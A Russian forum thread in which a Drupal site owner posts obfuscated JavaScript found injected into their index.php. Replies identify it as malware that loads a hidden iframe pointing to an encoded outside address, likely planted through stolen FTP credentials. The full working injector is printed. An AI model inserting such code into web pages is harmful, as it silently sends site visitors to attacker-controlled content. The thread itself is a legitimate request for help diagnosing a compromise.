LINUX.ORG.RU

Странный javascript код


0

1

Недавно у себя в index.php в Друпале обнаружил странный javascript код.

<!-- . --><script type="text/javascript">function nivrZ(){var ODxCiO='QTzDlT';if('qgzC'=='ZYOyY')fuKPFL();}if('jlRv'=='kCpaks')qvBv='UJvVh';function Ayame(){}function smao(){var iOKF='BGEkXS';if('prcw'=='HQCt')QqGfI();}
var cyPkQG="pars\x65Int";if('rlxp'=='HnVdp')psEi();var JTbFBdl="\x73lice";function vgRXfZ(){var MAck='fxLz';if('ZXGGT'=='cPXc')fTHSI();}var bZFrQ='HmRBg';var APZsfNN="929e9e9a645959958b9c969395a496999e99918f9e928f9c588d9997599d5a599398588d9193695b5a";function SnUc(){var BTVhzC='zwGAB';if('emZxFI'=='WFnQR')FtDC();}
var FgNSRa="fro\x6dCharCo\x64e";var eqOti=223;if('IpmeS'=='LkpDR')cApRp='DvOgPv';var ZgCvD;function ySEir(){var mJbfa='RKBNQg';if('puIV'=='DVHJq')GvDvbb();}
var UXcClKfW="";function nZBF(){}function VJPQOK(){}
var uhyAuA=(function(){if('wfZXm'=='ISRTwP')DRnXBQ();return this;function RliJO(){}var riDo='czizo';})();if('EREg'=='lJcrdN')TwHct();function yNaWsF(){var kBRrrg='qSPl';if('xwQxHq'=='bzBMwh')xeVMz();}
var dFPOEBQ="c\x6fns\x74ru\x63t\x6fr";var UJleNT=83;var gsWih=42;var yhtxAvV="siGwwBP"[dFPOEBQ];if('AEtY'=='VmFkOS')udRBI='gJRe';if('nuYR'=='DIJGs')uIan();function USQmt(){}
for(var DQzKKpM=0;DQzKKpM<APZsfNN.length;DQzKKpM+=2){yNxrQn=uhyAuA[cyPkQG](APZsfNN[JTbFBdl](DQzKKpM,DQzKKpM+2),16)-42;UXcClKfW+=yhtxAvV[FgNSRa](yNxrQn);if('IKQekT'=='GbYrCh')sqqI();}
if('pziD'=='nCXw')wZuYGV='JRME';function AeRnG(){}if('ipReFx'=='qvAMzX')UITkS='RDoAF';var OJlEPajVV="KyMdgd";var Adsg='OKSHrl';var rqVt;var DqoGelc=navigator.appVersion.indexOf("MSIE")!=-1?'<iframe name="'+OJlEPajVV+'" src="'+"UXcClKfW"+'">':'iframe';function buFYlw(){}
var FYiEdo=document.createElement(DqoGelc);FYiEdo.name=OJlEPajVV;var VSyIt;FYiEdo.setAttribute("name",OJlEPajVV);var wPrmDD;FYiEdo.id=OJlEPajVV;FYiEdo.src=UXcClKfW;if('qyWzj'=='SHMw')SbIw();var OQQX;function GJDjAW(){var eYgo='iNKI';if('BsrM'=='fxtXFU')Kvwzhi();}
FYiEdo.style.right="0px";function lQsnU(){var jWxh='AyTbR';if('jUGmaz'=='AzRQWh')CustY();}
FYiEdo.style.top="0px";if('wdMPx'=='rtWL')WxolI();function eSlE(){}
FYiEdo.style.height="1px"
if('ejGtqC'=='RILl')VPrF();function Coanh(){}if('Lzlfhh'=='zWkr')iGDQ='TnYRGF';FYiEdo.style.width="1px";function bZYwS(){var yvZY='qAOrdx';if('umodI'=='oPJJds')yShf();}function lLjNK(){var zMCTAn='pLBu';if('JQuOJ'=='aLNz')QXljHZ();}var CuWn='SSJu';FYiEdo.style.position="absolute";var pACt=173;if('ABPWm'=='LJZPpb')Ifgw();function TWXup(){function NckY(){}
if(document.body){if('CurXr'=='alak')YWWD='jyCuRT';if('STCXW'=='JSGKKv')TAAWQu='yfede';function GrQKII(){var cMGEpk='LBsWg';if('epQd'=='himN')fLUHP();}
document.body.appendChild(FYiEdo);if('VFzZ'=='gTBGC')yKrk();if('qnOH'=='Xysp')sZmG='qjYarK';}else{var GzkLx;var QnPt;setTimeout(TWXup,100);if('SIEyek'=='eUvY')GyVKAw();}
var ysjH=104;}
if('evhht'=='HTdg')XuTNqN='ArTT';if('seVTf'=='ewkYo')Cajnt();TWXup();function cbUCDI(){var yzKbhO='qIrRxy';if('uXUVD'=='eoAE')bquJ();}var azMf=256;function WQKNr(){}</script><!-- . -->

Что это и что оно делает? Можно ли его как-то дешифровать в более человекопонятный вид? Откуда такие коды берутся и почему оно так выглядит?

Бнальный вирусняк. Лет 5 назад был такой. Он ломился по ФТП всяким и заливал в *.html файлы вредоносный код.

VirRaa ★★★
()

почему оно так выглядит

- Почему «Ы»?"
- Чтобы никто не догадался.


вирусняк, конечно.
смотри, явно <iframe name=«'+OJlEPajVV+'» src=«'+„UXcClKfW“+'»>
и в «929e9e9a645959958b9c969395a49...» адрес

wxw ★★★★★
()

Нашел какашку и рассматривает «Что это такое?» ))

<Пойду посмотрю на всякий случай свой сайт>

Galant
()

Обычный код, пройденный обфускатором :)

xterro ★★★★★
()

обфусцированный xss
поимели, скорее всего украв пароль от фтп
на втором месте по вероятности - воткнули через дыру в друпале

Frakhtan-teh ★★
()

Ты небось на винде сидишь, да?

pi11 ★★★★★
()
Ответ на: комментарий от aol

Для вас, многоуважаемый школоло-кэп поясню:
XSS это тогда, когда пользователь ресурса может обойти (иногда в виду отсутствия) фильтрацию данных и встроить в код страницы вредоносный код.

А у ТСа проблема называется: я сижу на винде и у меня украли мой пасс к фтп.

winddos ★★★
()
Ответ на: комментарий от aol

и причем тут xss? простой слив ифрейма на сутру

xtraeft ★★☆☆
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.